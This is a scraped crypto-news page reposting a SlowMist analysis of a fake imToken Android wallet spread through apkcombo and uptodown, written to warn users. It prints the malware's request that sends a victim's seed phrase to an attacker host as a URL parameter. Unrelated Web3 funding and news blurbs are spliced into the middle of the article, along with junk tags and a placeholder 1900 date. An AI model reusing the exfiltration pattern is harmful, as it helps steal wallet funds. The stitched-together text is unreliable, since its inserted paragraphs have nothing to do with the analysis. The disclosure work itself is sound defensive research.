加密貨幣交易所 加密貨幣交易所
Ctrl+D 加密貨幣交易所
ads
首頁 > USDC > Info

Web3 假錢包第三方源調查分析:如何甄別網絡釣魚攻擊?_WEB:Custody Token

Author:

Time:1900/1/1 0:00:00

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

轉自:ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

Web3 Ventures Inc.啟動100萬加元私募輪融資:金色財經報道,專注于Web 3.0領域早期、中小型企業的多元化投資公司Web3 Ventures Inc. 宣布啟動私募輪融資,籌集的最高金額總計為1,000,000加元,本輪融資預計將于2023年 6 月 30 日或前后完成,但該公司會保留改變融資規模的權利。此外,Web3 Ventures Inc. 公司還宣布Insomnia Labs聯合創始人兼首席執行官Billy Huang成為其顧問委員會的第一位成員。(雅虎財經)[2023/4/27 14:29:09]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

Web3社區激勵初創公司ValuesCo完成270萬美元融資:1月26日消息,Web3 社區激勵初創公司 ValuesCo 宣布完成 270 萬美元種子輪融資,Web3 基金 Flori Ventures、Metaweb Ventures、OWN Fund、以及 Celo 總裁 Rene Reinsberg 等天使投資人參投。

ValuesCo(前身為 Socialstack)為品牌商、創作者和非營利組織創造一個基于社區驅動的獎勵生態系統,使 Web3 社區能夠在沒有代碼或區塊鏈知識的情況下設計和發布社交 Token,還可以通過電話/電子郵件登錄即時創建錢包,其產品在以太坊、Polygon 和 Celo 區塊鏈上構建并將營銷和社區交互轉化為參與式體驗。[2023/1/27 11:31:22]

網站分析

Nike推出Web3生態系統平臺Dot Swoosh:金色財經報道,Nike宣布推出Web3生態系統平臺Dot Swoosh,域名為Swoosh.nike。該項目隸屬于耐克虛擬工作室,工作室由耐克Snkrs應用程序前負責人、副總裁羅恩法里斯(Ron Faris)領導。

Ron Faris表示,Dot Swoosh將成為耐克虛擬創意的大本營,并將于本周五正式發布。該平臺將成為人們購買、展示和交易虛擬資產的場所,并解鎖對活動和產品的訪問權限。耐克并不認為虛擬產品是購買旅程的終點,而僅僅是旅程的開始。耐克著眼于體育的發展,也在尋找重塑社區、創意和忠誠度的新途徑。[2022/11/15 13:05:17]

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?

Open Web Collective宣布成立名為OWC Ventures的新部門,以投資早期的加密初創公司:金色財經報道,區塊鏈和web3加速器 Open Web Collective 已經成立了一個名為 OWC Ventures 的新部門,以投資早期的加密初創公司。

OWC Ventures的投資主管Jeff Lavoie表示,該部門得到了 Barry Silbert 的數字貨幣集團和區塊鏈協議NEAR的支持。

OWC Ventures 背后也將有一個基金,該基金尚未關閉,但該團隊表示,它預計“籌集 2000 萬美元的資金,用于 A 系列前種子交易,并有共同投資機會。

OWC的網站稱,OWC成立兩年的加速器項目由 26 位校友創始人組成,他們總共籌集了超過 3.6 億美元的資金。[2022/9/19 7:06:51]

我們先看下apkcombo的流量有多大:

Syndicate DAO的Web3投資俱樂部推出ETH存款功能:2月18日消息,Syndicate DAO 的 Web3 投資俱樂部推出 ETH 存款功能,支持鏈上投資或交易。項目方表示,選擇 ETH 而非 USDC 在于方便購買 NFT 與 Token 投資。[2022/2/18 10:00:15]

據數據統計站點similarweb統計,apkcombo站點:

全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags:WEBWEB3COMTOKENWEBOO價格WEB3COINCOMP價格Custody Token

USDC
紐約聯儲的政策變化可能會破壞Circle的美聯儲支付鐵路目標_CLE:加密貨幣是什么意思是傳銷

紐約聯儲更新的規則可能會認為穩定幣發行人Circle“沒有資格”進入美聯儲的貨幣市場。紐約聯儲針對希望使用其貨幣市場平衡器的交易對手發布了新規則,這給穩定幣發行人Circle使用美聯儲系統的意圖.

1900/1/1 0:00:00
美聯儲預測經濟衰退:你還應該購買比特幣、以太坊嗎?_比特幣:買比特幣的平臺

簡單來說美聯儲會議紀要表達了對今年晚些時候經濟衰退的預期。然而,比特幣在2023年表現良好,自年初以來價格飆升了65%。到目前為止,以太坊今年也表現不錯,上漲了約53%.

1900/1/1 0:00:00
數據:本周有YGG、GAL等6個加密項目將進行代幣解鎖_IDG:The Bridge

4月24日消息,據TokenUnlocks數據顯示,本周有6個加密項目將進行代幣解鎖,總計釋放價值超5000萬美元.

1900/1/1 0:00:00
關于部分ETF產品下架的公告_COI:USD

尊敬的CoinW用戶: 為給您提供更優質的用戶權益,CoinW將對部分ETF產品進行優化,CoinW將于2023年4月27日15:00?(UTC8)暫時下架T?4L、T?4S、DPX?4L、DP.

1900/1/1 0:00:00
NFT交易平臺生存現狀研究:后版稅戰爭時代下的龍頭之爭_SEA:SEA

原文作者:nobody 原文編輯:ColinWu披露:作者作為個人投資者持有NFT平臺代幣等相關資產,與任一平臺或項目方均無任何利益往來.

1900/1/1 0:00:00
Update on Unstaking/Withdrawal of Staked ETH and Rewards from Staking ETH Post Ethereum''s Shapella Upgrade_ETH:ING

FollowingtheShapellaupgradethattookplaceon12/04/2023at10:27PMUTC.

1900/1/1 0:00:00
ads